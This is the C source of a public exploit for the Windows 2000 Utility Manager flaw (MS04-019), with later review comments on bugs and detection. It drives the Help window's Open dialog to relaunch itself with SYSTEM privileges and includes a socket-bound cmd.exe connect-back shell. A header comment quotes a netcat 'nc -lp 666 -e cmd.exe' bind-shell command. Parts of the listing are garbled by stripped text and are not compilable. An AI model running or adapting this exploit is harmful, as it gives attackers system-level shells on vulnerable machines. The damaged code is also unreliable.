Windows 2000 Utility Manager all in one Exploit (MS04-019)


                        
/******************************************************************************************
 *****C*****O*****R*****O******M******P*****U*******T*******E******R*****2***0***0***4****
 **                                 [Crpt] Utility Manager exploit v2.666 modified by kralor [Crpt]                               **
*******************************************************************************************
 **   It gets system language and sets windows names to work on any win2k :P                                            **
 **   Feel free to add other languages :)                                                                                                   **
 **   v2.666: added autonomous (allinone) remote exploitation system ;)                                                    **
 **   It can be executed through poor cmd.exe shells (like nc -lp 666 -e cmd.exe from a                                **
 **   normal user account). Must be called with an argument (any argument)                                                 **
 **   You know where we are..                                                                                                                  **
 *****C*****O*****R*****O******M******P*****U*******T*******E******R*****2***0***0***4****
 ******************************************************************************************/
/* original disclaimer */
//by Cesar Cerrudo  sqlsec>at< elevation of privileges exploit for windows utility manager one you a shell with system privileges have problems try changing sleep values. end original disclaimer
#include 
#include 
#include 
#include 

#pragma comment (lib,"ws2_32")

#define EXIT_SHELL "exit -shell"
#define HOST "localhost"
#define PORT 31337

/* Localized window titles used to find the Utility Manager windows by name.
 * id is a primary language id (the same PRIMARYLANGID() value set_lang()
 * returns; 0x0c is LANG_FRENCH, 0x09 LANG_ENGLISH). The three strings are the
 * title-bar text of the Utility Manager window, the Windows Help window and
 * the "Open" file dialog in that language; FindWindow() looks them up later.
 * NOTE(review): the code that picks the row index from the language id is not
 * in this listing (the rows are used as lang[i] below). */
struct {
 int id;         /* PRIMARYLANGID of the locale this row describes */
 char *utilman;  /* Utility Manager main window title */
 char *winhelp;  /* Windows Help window title */
 char *open;     /* file-open dialog title */
} lang[] = {
        { 0x0c,"Gestionnaire d'utilitaires","aide de Windows","Ouvrir" }, /* French  */
        { 0x09,"Utility manager","Windows Help","Open" }            /* English */
};

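/*
 * Print the human-readable name of a Windows primary language id, followed
 * by "\r\n", on stdout.
 *
 * id is a PRIMARYLANGID() value (set_lang() passes the system/user ids in).
 * The first rows of the table follow the LANG_* numbering (0x09 English,
 * 0x0c French); later rows were transcribed by hand and may not line up
 * exactly with the Windows constants, so treat them as best-effort labels.
 *
 * Ids outside the table print "unknown (language id N)" instead of reading
 * past its end: PRIMARYLANGID can be anything up to 0x3ff, and the original
 * indexed the 77-entry table unchecked.
 */
void print_lang(int id)
{
        static const char *const lang_list[] = {
                             "Neutral","Arabic","Bulgarian","Catalan","Chinese","Czech",
                             "Danish","German","Greek","English","Spanish","Finnish",
                             "French","Hebrew","Hungarian","Icelandic","italian",
                             "Japanese","Korean","Dutch","Norwegian","Polish",
                             "Portuguese","Romanian","Russian","Croatian","Serbian",
                             "Slovak","Albanian","Swedish","Thai","Turkish","Urdu",
                             "Indonesian","Ukrainian","Belarusian","Slovenian",
                             "Estonian","Latvian","Lithuanian","Farsi","Vietnamese",
                             "Armenian","Azeri","Basque","FYRO Macedonian","Afrikaans",
                             "Georgian","Faeroese","Hindi","Malay","Kazak","Kyrgyz",
                             "Swahili","Uzbek","Tatar","Not supported","Punjabi",
                             "Gujarati","Not supported","Tamil","Telugu","Kannada",
                             "Not supported","Not supported","Marathi","Sanskrit",
                             "Mongolian","Galician the best ;)","Konkani","Not supported",
                             "Not supported","Syriac","Not supported","Not supported",
                             "Divehi","Invariant"};
        /* lang_list is a real array here, so the sizeof idiom is valid. */
        const size_t count = sizeof lang_list / sizeof lang_list[0];

        /* Bounds check: negative ids and ids past the table would otherwise
         * be an out-of-bounds read. */
        if (id < 0 || (size_t)id >= count) {
                printf("unknown (language id %d)\r\n", id);
                return;
        }
        printf("%s\r\n",lang_list[id]);
}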

/*
 * Child-side half of the "allinone" mode: connect to host:port over TCP and
 * start "cmd" with the connected socket as its stdin/stdout/stderr, so
 * whatever sits at the other end of the connection talks to that shell.
 *
 * Returns 0 once cmd has been started (it does not wait for it) and -1,
 * after printing a message on stdout, when socket creation, name
 * resolution, connect() or CreateProcess() fails.
 *
 * NOTE(review): WSAStartup() is not called here, so it must happen in the
 * caller (not visible in this listing) for any of the Winsock calls to work.
 * NOTE(review): from a detection standpoint the observable is a hidden
 * cmd.exe whose standard handles are a socket, started right after its
 * parent made an outbound connection.
 */
int cnx(char *host, int port)
{
        SOCKET sock;
        struct sockaddr_in yeah;
        struct hostent *she;
        PROCESS_INFORMATION ProcessInformation;
        STARTUPINFO si;     /* filled field by field below, never zeroed */

        printf("[i] should be called by myself, try with any argument to load the attack\r\n");
        fflush(stdout);
        /* AF_INET (2), SOCK_STREAM (1): a plain TCP socket. */
        sock = WSASocket(0x02,0x01,0x00,0x00,0x00,0x00);
        /* BUG(review): WSASocket() returns INVALID_SOCKET ((SOCKET)~0) on
         * failure, never 0, so this check cannot fire; a failed socket is
         * only noticed later as a failed connect(). */
        if(!sock) {
                printf("error: unable to create socket\r\n");
                return -1;
                }

        yeah.sin_family=AF_INET; 
        yeah.sin_addr.s_addr=inet_addr(host); /* overwritten by the lookup below either way */
        yeah.sin_port=htons((u_short)port);

/* Name lookup first, numeric dotted-quad as the fallback. */
if((she=gethostbyname(host))!=NULL) { 
        memcpy((char *)&yeah.sin_addr,she->h_addr,she->h_length); 
        } else { 
        if((yeah.sin_addr.s_addr=inet_addr(host))==INADDR_NONE) {
                printf("error: cannot resolve host\r\n");
                return -1;
                } 
        }
        /* Every connect() failure is reported as "refused". sock is not
         * closed on any error path (the process exits shortly afterwards). */
        if(connect(sock,(struct sockaddr*)&yeah,sizeof(yeah))!=0) {
                printf("error: connection refused\r\n");
                return -1;
                }

        /* 0x44 (68) matches sizeof(STARTUPINFO) for a 32-bit ANSI build.
         * NOTE(review): dwXCountChars, dwYCountChars and dwFillAttribute are
         * never assigned, so they hold stack garbage; that is only harmless
         * because the STARTF_* flags that would make Windows read them are
         * not set in dwFlags. */
        si.cb = 0x44;
        si.lpReserved = 0x00;
        si.lpTitle = 0x00;
        si.lpDesktop = 0x00;
        si.dwX = 0x00;
        si.dwY = 0x00;
        si.dwXSize = 0x00;
        si.dwYSize = 0x00;
        si.wShowWindow = 0x00;  /* 0 == SW_HIDE: the console window is hidden */
        si.lpReserved2 = 0x00;
        si.cbReserved2 = 0x00;

        /* 0x101 == STARTF_USESTDHANDLES (0x100) | STARTF_USESHOWWINDOW (0x1). */
        si.dwFlags = 0x101;

        /* Redirect the child's three standard handles to the socket. */
        si.hStdInput  = (void *)sock;
        si.hStdOutput = (void *)sock;
        si.hStdError = (void *)sock;

        /* bInheritHandles = 1 so the child receives the socket handle;
         * dwCreationFlags = 0x10 == CREATE_NEW_CONSOLE. The child's handles
         * in ProcessInformation are never closed or waited on. */
        if(!CreateProcess(0x00, "cmd", 0x00, 0x00, 0x01, 0x10, 0x00, 0x00,&si, &ProcessInformation)) {
                printf("CreateProcess() error\r\n");
                return -1;
        }
        return 0;
}

/*
 * Operator-side relay: forward what is typed on stdin (fd 0) to the shell
 * behind sock and print what comes back. Typing a line that starts with
 * EXIT_SHELL sends "exit\r\n" to the remote cmd and leaves the loop; the
 * function then prints "[i] shell lost" and returns.
 *
 * NOTE(review): this listing is damaged. The line "if (length0) {" has lost
 * the text between a '<' and a '>' to HTML stripping, and with it the
 * declaration of sin_size and the loop that fills buffer from the socket
 * (sin_size is used below but declared nowhere). Do not treat the body as
 * compilable as shown.
 */
void cmdshell(int sock)
{
        int length=666;     /* any non-zero value so the loop is entered */
        char buffer[1024];

while(length) {
                length=read(0,buffer,sizeof(buffer));
                /* BUG(review): read() may return sizeof(buffer), which makes
                 * this write one byte past the end, or -1 on error, which
                 * indexes buffer[-1]; length needs checking before this. */
                buffer[length]=0;
                if(!strncmp(buffer,EXIT_SHELL,strlen(EXIT_SHELL))) {
                        send(sock,"exit\r\n",6,0);
                        break;
                        }
                /* length becomes the send() result: the loop ends on 0 but a
                 * -1 error keeps it going until the next read(). */
                length=send(sock,buffer,length,0);
                if (length0) {  /* damaged line, see the header note */
                buffer[sin_size]=0x00;
                printf("%s",buffer);
                fflush(stdout);
                }
        printf("\r\n[i] shell lost\r\n");
        return;
}

/*
 * Pick the primary language id the window-title table should be matched
 * against.
 *
 * Returns the user's primary language id when it equals the system's. When
 * the two differ, both are printed and one keypress chooses: '1' returns
 * the system id, '2' the user id, anything else prints a message and calls
 * exit(0).
 */
int set_lang(void)
{
        unsigned int lang_sys = PRIMARYLANGID(GetSystemDefaultLangID());
        unsigned int lang_usr = PRIMARYLANGID(GetUserDefaultLangID());
        unsigned int choice;

        /* Same primary language on both sides: nothing to ask. */
        if (lang_usr == lang_sys)
                return lang_usr;

        printf("warning: user language differs from system language\r\n\r\n");
        printf("1. system : ");
        print_lang(lang_sys);
        printf("2. user   : ");
        print_lang(lang_usr);
        printf("Select(1-2): ");
        fflush(stdout);

        /* Single unbuffered keypress; compared as a character code. */
        choice = getch();
        switch (choice) {
        case '1':
                printf("system language\r\n");
                return lang_sys;
        case '2':
                printf("user language\r\n");
                break;
        default:
                printf("wrong choice '%c', leaving.\r\n", choice);
                exit(0);
        }
        return lang_usr;
}

/*
 * Print the program banner on stdout and flush it, so it shows up even when
 * stdout is a pipe or a socket rather than a console.
 */
void banner()
{
        static const char text[] =
                "\r\n\r\n\t[Crpt] Utility Manager exploit v2.666 modified by kralor [Crpt]\r\n"
                "\t\t\t  base code by Cesar Cerrudo\r\n"
                "\t     added autonomous (allinone) remote exploitation system\r\n"
                "\t\t\t   You know where we are...\r\n\r\n";

        fputs(text, stdout);
        fflush(stdout);
}

/*
 * Entry used when the program is re-launched by the exploit: run the
 * connect-back routine against HOST:PORT and terminate. cnx()'s result is
 * deliberately ignored because the process exits either way.
 */
void give_magicshell(void)
{
        (void)cnx(HOST, PORT);
        exit(0);
}

/*
 * NOTE(review): the listing is damaged from here on. The line
 * "for(i=0;i0;j--)" is two fragments glued together: the opening of
 * enter_filename()'s loop ("for(i=0;i<" ...) and the tail of a loop in
 * main() that walks argv[0] backwards to its last '\\' (...">0;j--)").
 * Everything between them — the rest of enter_filename(), main()'s
 * signature and the declarations of the names used below (cmd, path,
 * path_len, point, lHandle, lHandle2, hdlr, i, j), plus whatever set up the
 * language index i and the handle hdlr — was stripped as if it were an
 * HTML tag; the same stripping emptied the four #include lines at the top.
 * What follows is the second half of main() and is not compilable as shown.
 *
 * What the surviving part does (the MS04-019 issue): start Utility Manager,
 * open its Help, drive the Help window's "Open" file dialog with window
 * messages so that it launches this program again, then close the windows
 * and wait. The MS04-019 update removes this path; on a patched system the
 * steps below do not yield an elevated process. For detection, the
 * observable is an unexpected child process of utilman.exe / the Help
 * window's process.
 */
void enter_filename(HWND hwnd,char *filename,int size)
{
        unsigned int i;

        for(i=0;i0;j--)   /* damaged line, see the note above */
                if(argv[0][j]=='\\') {
                        j++;break;
                }
        /* NOTE(review): strncpy() does not NUL-terminate when the source
         * fills the buffer, and strlen(cmd) below then runs past it; cmd's
         * size is declared in the lost part. */
        strncpy(cmd,&argv[0][j],508);
        /* Append ".exe" when the fourth-from-last char is not a '.'; a name
         * shorter than four chars makes the index wrap (unsigned arithmetic). */
        if(cmd[strlen(cmd)-4]!='.')
                strcat(cmd,".exe");

        printf("prog: %s\r\n",cmd);
        /* Last character becomes '?', a wildcard for the dialog's name filter
         * (cmd is sent to the file-name box with WM_SETTEXT further down). */
        cmd[strlen(cmd)-1]='?';
        fflush(stdout);
//  run utility manager (hidden)
        WinExec("utilman.exe /start",SW_HIDE);
        Sleep(1000);

        /* Locate it by its localized title; i indexes the lang[] table and
         * is chosen in the lost part of main(). */
        lHandle=FindWindow(NULL, lang[i].utilman);   
    if (!lHandle) {
                printf("error: unable to start utilman.exe.\r\n");
                return 0;
        }

    PostMessage(lHandle,0x313,0,0); //=right click on the app button in the taskbar or Alt+Space Bar
        Sleep(100);

        SendMessage(lHandle,0x365,0,0x1); //send WM_COMMANDHELP  0x0365  lParam must be NULL
        Sleep(300);
        
        /* Press Enter in the Windows Help window (found by localized title). */
        SendMessage (FindWindow(NULL, lang[i].winhelp), WM_IME_KEYDOWN, VK_RETURN, 0);
        Sleep(500);

        // find open file dialog window ("#32770" is the standard dialog class)
        lHandle = FindWindow("#32770",lang[i].open);
    // get input box handle
    lHandle2 = GetDlgItem(lHandle, 0x47C);
    Sleep(500);

        /* NOTE(review): neither malloc() nor GetCurrentDirectory() is checked;
         * path_len comes from the lost declarations. */
        path=(char*)malloc(path_len);
        GetCurrentDirectory(path_len,path);
        printf("path: %s\r\n",path);
        /* Navigate the dialog to this program's directory. */
    SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)path);
    SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
        free(path);
        fflush(stdout);

    // set text to filter listview to display only this program's name
    SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)cmd);
    Sleep(800);

    // send return
    SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);

    //get navigation bar handle
    lHandle2 = GetDlgItem(lHandle, 0x4A0);
    
    //send tab
    SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
    Sleep(500);
    lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
    //get list view handle
    lHandle2 = GetDlgItem(lHandle2, 0x1);

        /* Presumably types the name minus its last four characters into the
         * list view to select the file; enter_filename()'s body is lost. */
        enter_filename(lHandle2,cmd,strlen(cmd)-4);
    Sleep(500);

    //popup context menu
    PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
    Sleep(1000);

    // get context menu handle (whatever window is at screen point 10,30)
    point.x =10; point.y =30;
    lHandle2=WindowFromPoint(point);

    /* Two "down" presses and Enter: the third entry of that menu is chosen. */
    SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
    SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
    SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return

    SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window
    Sleep(500);

        SendMessage (FindWindow(NULL, lang[i].winhelp), WM_CLOSE, 0, 0);// close open error window
        SendMessage (FindWindow(NULL, lang[i].utilman), WM_CLOSE, 0, 0);// close utilitymanager
        /* hdlr is declared in the lost part; presumably the thread or process
         * handle for the listening/relay side (cmdshell). Waits forever. */
        WaitForSingleObject(hdlr,INFINITE);
        WSACleanup();   /* pairs with a WSAStartup() that is not visible here */
        return 0;
}
